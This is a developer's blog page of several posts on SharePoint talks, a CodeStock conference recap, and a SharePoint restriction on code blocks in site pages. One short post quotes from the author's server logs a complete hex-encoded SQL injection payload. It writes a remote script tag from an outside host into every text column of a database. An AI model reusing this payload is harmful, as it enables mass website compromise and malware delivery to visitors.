Programming
ETNUG Presentation: SharePoint for Developers Who Hate SharePoint
I gave a presentation for ETNUG tonight called "SharePoint for Developers Who Hate SharePoint." The presentation is geared toward small IT departments who might not be able to dedicate a team to SharePoint development. (I was on one of these before I started at Trident.) These teams might not be able to use WSS to its full potential or have any need for MOSS. However, managed carefully, there are ways that out-of-the-box SharePoint features can make their lives easier.
You can download the slide deck for "SharePoint for Developers Who Hate SharePoint" as well as "Introduction to Windows SharePoint Services 3.0", which was the original presentation I submitted for CodeStock. (They're in PowerPoint 2007 format--you can get the PowerPoint 2007 Viewer here.
In addition, here are some of the links I mentioned in my presentation:
- Inside Microsoft Windows SharePoint Services 3.0
- Professional SharePoint 2007 Development
- Microsoft SharePoint Server 2007 Bible
- Microsoft SharePoint 2007 Unleashed
- elumenotion.com - Doug Ware's site, which has his SharePoint Skinner utility and the slides from his CodeStock talk
- CleverWorkarounds.com
- EndUserSharePoint.com
- Microsoft Office SharePoint Server 2007 Best Practices
- Planning and Architecture for Windows SharePoint Services 3.0
- WSS3 Evaluation Virtual PC image
- MOSS 2007 Evaluation Virtual PC image
- WSPBuilder - Visual Studio extension for packaging, deploying, and debugging SharePoint solutions
- SharePoint Manager 2007
- U2U CAML Query Builder
CodeStock Wrap-Up
I just got around to posting my notes from CodeStock for my coworkers, so I figured I'd post some of the highlights here too.
Mike, Alan, and Wally did an excellent job putting this together. I was surprised that, for a first year conference, we had such a large turnout and yet everything ran really smoothly. (If it didn't run smoothly, they at least did an excellent job of faking a well-orchestrated event.) It wasn't quite as big as DevLink, so we may end up being the MTAC to their AWA*. :)
Behind the scenes, I'm very happy with the commitment to selecting local speakers. I think this is going to be one of the things that sets CodeStock apart, especially as it grows. It shows a commitment not only to the industry in our area, but the people as well. I feel there's a lot more celebrity than there needs to be in the software development world, so a locally-focused conference is a refreshing trend.
Here's a rundown of the sessions I attended:
- 10 Open Source Tools You Should Be Using - Good talk, even though I'm not much of an MVC or TDD guy. Loved the fact that James presented alternatives to each of the applications he discussed. The talk sold me on checking out Castle ActiveRecord for projects where I can't use LINQ to SQL, as well as checking out SQLite if I ever need to write a desktop application with a local data store. A full list of these tools are on James's blog.
- What's This XNA Thing? - I think my coworkers looked at me funny when I said I wanted to attend this session. I haven't touched XNA since I walked through a Pong tutorial in the 1.0 release, but this was a pretty good motivation to look at it again. I don't think Chris has posted slides yet, but most of the resources he listed can be found on the Twin Cities XNA User Group site.
- SharePoint Developer's Survival Guide - If you're doing any SharePoint development, this talk was essential. You can find the slides on Doug's site; there's really too much to cover. (I like the fact that he supported my WSPBuilder bias.) He came from the same angle I used in my SharePoint talk, except developer-oriented instead of more administrator-/manager-oriented: these are the pitfalls, and here's how you avoid them. The most telling thing in his speech: "it takes at least 2 years to make a good SharePoint developer."
- httpModules and httpHandlers - I've written a few handlers, but this speech gave me a better understanding of modules, as well as a lot of other uses for handlers I hadn't considered. Chris posted his content from CodeStock on his blog.
- Much Ado About Testing - Again, I'm not a TDD guy but I am sold on unit testing. I'm also not quite up to speed on concepts like mocking, so this session filled me in quite a bit. Not quite sure I want to switch from NUnit to MbUnit yet, I haven't run into a case where mocks would actually be beneficial to me**, and Watin really sounds too complicated for my purposes right now. But it's nice to know that it's out there.
For any .NET developers who enjoyed CodeStock--make sure you come and support the East Tennessee .NET User Group. ETNUG was the driving force for a lot of the publicity, speakers, and sponsorship; supporting the group can only help make the conference better next year. If you enjoyed the local speakers at the conference, this is the place to get even more (including me, at the end of this month, speaking on SharePoint).
There was also some talk of doing some Open Spaces during one of our future meetings--I don't know whether that will come to pass, but from what I heard about the Open Spaces (I didn't make it to any of the sessions), it would be a great alternative to the typical presentation.
* Translation for non-anime geeks: AWA is a bigger convention than MTAC, but if you're in the area, it's well worth attending both.
** Of course, it shouldn't be any secret that I test my data access.
Seriously, WTF?
Not sure if some new worm or exploit has exploded upon the internet, but I'm seeing some really bizarre hits on my site today. Requests for stuff like:
/programming/38/?';DECLARE%20@S%20CHAR(4000);SET%20@S=CAST(0x4445434C415245204054207661726368617228323535292C40432076617263686172283430303029204445434C415245205461626C655F437572736F7220435552534F5220464F522073656C65637420612E6E616D652C622E6E616D652066726F6D207379736F626A6563747320612C737973636F6C756D6E73206220776865726520612E69643D622E696420616E6420612E78747970653D27752720616E642028622E78747970653D3939206F7220622E78747970653D3335206F7220622E78747970653D323331206F7220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20657865632827757064617465205B272B40542B275D20736574205B272B40432B275D3D5B272B40432B275D2B2727223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272720776865726520272B40432B27206E6F74206C696B6520272725223E3C2F7469746C653E3C736372697074207372633D22687474703A2F2F73646F2E313030306D672E636E2F63737273732F772E6A73223E3C2F7363726970743E3C212D2D272727294645544348204E4558542046524F4D20205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F72%20AS%20CHAR(4000));EXEC(@S);
What is that, an SQL injection attack for SQL Server? Which might be quite the issue if my site wasn't hosted on a Linux server. (Or, quite the issue if I was running on a webhost that hosted SQL Server on the same box as web with no firewall... which I suppose would be its own WTF.)
SharePoint Gotcha: Debugging Code Blocks and Event Handlers (or the lack thereof) in Site Pages
Here's a problem one of the other developers here ran into--if you create your own site pages in SharePoint, you're bound to see an error like this pop up:
An error occurred during the processing of /mypage.aspx. Code blocks are not allowed in this file.
... wait, what?
Yup, that's what it says. You can't use code blocks in ASPX files that are stored in SharePoint. No <% Response.Write("Hello World!") %>. No <%# Eval("Name") %>. As an added bonus, <asp:Button runat="server" ID="MyButton" OnClick="MyButton_Click" /> doesn't even work because it declares an event handler.
That's not really the gotcha here. This is well-documented in Inside Microsoft Windows SharePoint Services 3.0: check page 81, if you're following along in your books at home. SharePoint has a very good reason for this security setting to be there: users can create and modify ASPX files that are stored within the SharePoint database. So, if you could run arbitrary code within an ASPX file, a user with no access to the server could potentially run malicious code.
So where does that code go? Well, it goes in the *.cs or *.vb code-behind file. That means to declare an event handler, you're going to have to do something like this:
protected override void CreateChildControls() { base.CreateChildControls(); SaveButton.Click += SaveButton_Click; CancelButton.Click += CancelButton_Click; }
And rather than displaying data in a GridView or Repeater using Eval() or Bind(), you have to give it an OnRowDataBound or OnItemDataBound handler. So that means, rather than doing this:
<asp:Repeater runat="server" ID="MyRepeater"> <ItemTemplate> <asp:Literal runat="server" Text='<%# Eval("Name") %>' /> </ItemTemplate> </asp:Repeater>
You do this:
protected void MyRepeater_ItemDataBound(object sender, RepeaterItemEventArgs e) { // Make sure we have a data item in this row if (e.Item.DataItem == null) { return; } // Convert the data item to its original type DataRowView dr = (DataRowView)e.Item.DataItem; // Find our literal control in the current repeater item Literal NameLiteral = e.Item.FindControl("NameLiteral") as Literal; // If it was found, set its value if (NameLiteral != null) { NameLiteral.Text = dr["Name"].ToString(); } }
I can imagine you're griping already. It's easy to see the security reason for doing this--you don't want users to be able to run arbitrary code on your server. But it's so freaking complicated. (Well, it is until you get used to the idea.) But as I said, that's not the real gotcha here. So what is the point of this post?
The real gotcha here is that this doesn't seem to be a default security setting, at least in the development environments we're using. (Andy's using a VirtualPC image he set up himself; I'm using Microsoft's WSS3 VirtualPC image.) We only ran into this issue after he tried to install a project on the client's server.
I don't think we've figured out exactly what turns on this security setting in SharePoint configuration, but I have found out how you can force your development environment to throw these sort of errors. All you have to do is dig into your development site's web.config file and add the following node:
<configuration> <SharePoint> <SafeMode> <PageParserPaths> <PageParserPath VirtualPath="/*" CompilationMode="Always" AllowServerSideScript="false" IncludeSubFolders="true" /> </PageParserPaths> </SafeMode> </SharePoint> </configuration>
Once that's done, you can now catch yourself using stuff that's not allowed in ASPX pages before it gets to your client's server.
On Presenting
I just finished a presentation tonight at ETNUG called "SharePoint Sucks!" The presentation was my entry into Speakers Idol, where people who weren't selected as speakers for Codestock session could compete for one last remaining session. Didn't win, but it did net me the presentation at the August ETNUG meeting.
Incidentally, for those interested, here are the links I referenced as resources:
- Downloadable WSS books from Microsoft
- 7 Development Projects for SharePoint (PDF)
- CleverWorkarounds.com - lots of good SharePoint articles, including "Why Do SharePoint Projects Fail" series
- EndUserSharePoint.com - "Thinking SharePoint" series
- SharePoint Server 2007 Best Practices
- WSS3 Evaluation Virtual PC image
- MOSS2007 Evaluation Virtual PC image
The topic, contrary to its name, was about when to use and when not to use SharePoint. (If you really want to know where the title comes from, go through the comments on some of my SharePoint posts.) It's been quite a while since I've had to present anything, so I've been critiquing the whole experience.
One suggestion I received is to ditch the "Intro to Windows SharePoint Services 3" topic I originally submitted, and go with a continuation of "SharePoint Sucks!" for August's ETNUG meeting. I'm not completely comfortable with this idea, because I don't feel that approach is quite my style.
On the other hand, I have found out that I'm much more comfortable at Q&A and discussion than I am at presenting all my own stuff. I think it's because I like thinking inside the box, so to speak. Q&A forces me to tackle the questions that people need to know rather than trying to do an overview that's simultaneously broad and deep. In turn, this keeps me from overanalyzing details or going off on tangents. Extending the "SharePoint Sucks" talk should naturally lead to better discussion. (Maybe.)
So I'm kind of at a loss as to which way to go for the August meeting right now.
I noticed an interesting side effect after presenting that I'm not sure I like. Preparation for a presentation will usually be stretched out over a few days. So by the time the presentation rolls around, you've been living in this world where your topic is The Most Important Thing Ever. And once it's over and the rush sort of drains out of your system, your priorities correct themselves and you realize just how insignificant your topic is in the larger scheme of things. It almost makes the presentation itself seem silly.
And yes, I know this post is completely breaking the fourth wall in ways good bloggers shouldn't. But that's because it might mess up their space suits.
